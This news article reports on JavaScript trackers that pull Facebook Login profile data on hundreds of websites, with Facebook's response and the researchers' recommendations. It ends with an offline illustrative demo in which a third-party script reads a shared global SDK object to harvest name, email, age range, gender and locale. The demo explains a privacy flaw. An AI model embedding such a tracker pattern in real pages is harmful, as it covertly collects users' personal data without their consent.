Your Facebook data can be snatched by JavaScript trackers

Abusive scripts are snatching data when users log in to websites with Facebook credentials.


David Lumb
April 19, 2018 3:47 PM

Facebook is looking into a security report that reveals Facebook user data can be snatched by JavaScript trackers embedded in websites that let users log in with their Facebook credentials. Not just their name and email address, either: the scripts can also collect age range, gender, locale and possibly a profile photo, depending on how much access the user granted the website. Once someone logs in, any third-party JavaScript running on the page can reportedly query the same login session the site's own code uses and retrieve that data at will.

The report, published on Freedom to Tinker, the blog of Princeton's Center for Information Technology Policy, listed 431 of the top one million sites (by Alexa rank) that have the shady scripts embedded. The list included cloud database provider MongoDB, which, after TechCrunch brought the issue to its attention, reportedly shut down the abusive script.

"Scraping Facebook user data is in direct violation of our policies," a Facebook spokesperson told Engadget. "While we are investigating this issue, we have taken immediate action by suspending the ability to link unique user IDs for specific applications to individual Facebook profile pages, and are working to institute additional authentication and rate limiting for Facebook Login profile picture requests."


The report concluded that the exposure wasn't due to a bug in Facebook's login feature; instead, it's "due to the lack of security boundaries between the first-party and third-party scripts in today's web." To close this loophole, the report's authors recommend that Facebook (and any other service offering a social login) audit how its login APIs are used and who is accessing login data. Cheekily, they also recommend finally shipping Anonymous Login with Facebook, which was announced four years ago.
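The "no security boundary" point is easier to see in code. The following is an added illustration, not code from the report, from Facebook or from Engadget. In a browser the Facebook JavaScript SDK is attached to the shared global as window.FB, and every script on the page, whether the site's own or an embedded tracker, shares that global. The FB object below is a constructed, offline stand-in that mirrors the public SDK's method names (init, login, getLoginStatus, api) and answers from made-up profile data; the profile values and the app ID are assumptions, and nothing here talks to Facebook.

```javascript
// Constructed sample profile (not real data). "email" is gated behind the
// email permission, as it is in the real Graph API.
const FAKE_PROFILE = {
  id: '10000000000001',
  name: 'Example User',
  email: 'example.user@example.com',
  age_range: { min: 21 },
  gender: 'female',
  locale: 'en_US',
};

// Stand-in for the Facebook JS SDK. Callbacks fire synchronously here to keep
// the demo simple; the real SDK is asynchronous, but what a caller can reach
// is the same.
function makeFakeSdk(profile) {
  let session = null;
  return {
    init(opts) { this.appId = opts.appId; },
    // `scope` is the comma-separated permission list the user granted.
    login(scope) {
      session = { accessToken: 'fake-access-token', grantedScopes: scope.split(',') };
    },
    getLoginStatus(cb) {
      cb(session ? { status: 'connected', authResponse: session } : { status: 'unknown' });
    },
    api(path, params, cb) {
      if (!session) return cb({ error: { message: 'Not logged in' } });
      if (path !== '/me') return cb({ error: { message: 'Only /me is simulated' } });
      const out = {};
      for (const field of (params.fields || 'id,name').split(',')) {
        if (field === 'email' && !session.grantedScopes.includes('email')) continue;
        if (field in profile) out[field] = profile[field];
      }
      cb(out);
    },
  };
}

// First-party code: the site loads the SDK onto the global and logs the user
// in with whatever scope it asked for. (In a browser `globalThis` is `window`.)
function firstPartyLogin(scope) {
  globalThis.FB = makeFakeSdk(FAKE_PROFILE);
  globalThis.FB.init({ appId: '000000000000000' }); // made-up app ID
  globalThis.FB.login(scope);
}

// Third-party code: an embedded tracker that was never handed an SDK object.
// It simply reads the same global the site's own code created and asks for
// everything the user's login permits. Returns null when it gets nothing.
function thirdPartyTracker() {
  const FB = globalThis.FB;
  if (!FB) return null;
  let harvested = null;
  FB.getLoginStatus((resp) => {
    if (resp.status !== 'connected') return;
    FB.api('/me', { fields: 'id,name,email,age_range,gender,locale' }, (data) => {
      if (!data.error) harvested = data;
    });
  });
  return harvested;
}

// Clears the simulated page state between runs.
function resetPage() { delete globalThis.FB; }

// Stand-alone demo.
resetPage();
console.log('before login:', thirdPartyTracker());
firstPartyLogin('public_profile,email');
console.log('after login with email scope:', thirdPartyTracker());
resetPage();
firstPartyLogin('public_profile');
console.log('after login without email scope:', thirdPartyTracker());
```

The tracker never receives a token or an SDK handle from the site; it gets the data purely because both scripts execute in one global scope. The second run shows the "depending on how much access the user allowed" caveat from the article: with only public_profile granted, the email field is absent but name, age range, gender and locale still leak.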
